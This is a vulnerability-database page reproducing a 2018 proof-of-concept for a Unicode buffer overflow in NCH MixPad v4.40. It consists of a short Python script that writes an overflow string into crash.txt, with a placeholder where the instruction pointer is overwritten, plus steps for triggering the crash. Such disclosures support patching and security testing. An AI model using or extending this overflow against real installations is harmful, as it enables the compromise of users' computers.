Lucene search
K

MixPad v4.40 - Unicode Buffer Overflow Exploit

🗓️ 13 Dec 2018 00:00:00Reported by zdtType 
zdt
 zdt
🔗 0day.today👁 34 Views

NCH Software MixPad v4.40 Unicode Buffer Overflow Exploi

Code
#!/usr/bin/python
# Exploit Author: Gionathan "John" Reale
# Exploit Title: NCH Software MixPad v4.40 - Unicode Buffer Overflow
# Date: 2018-12-12
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/
# Version: v4.40-v4.10
# Tested On: Windows 7
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound' 


filename="crash.txt"
 
junk = "A"*249
eip = "\xcc"*2  			
fill = "B"*100				
buffer = junk + eip + fill

  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Dec 2018 00:00Current
0.6Low risk
Vulners AI Score0.6
34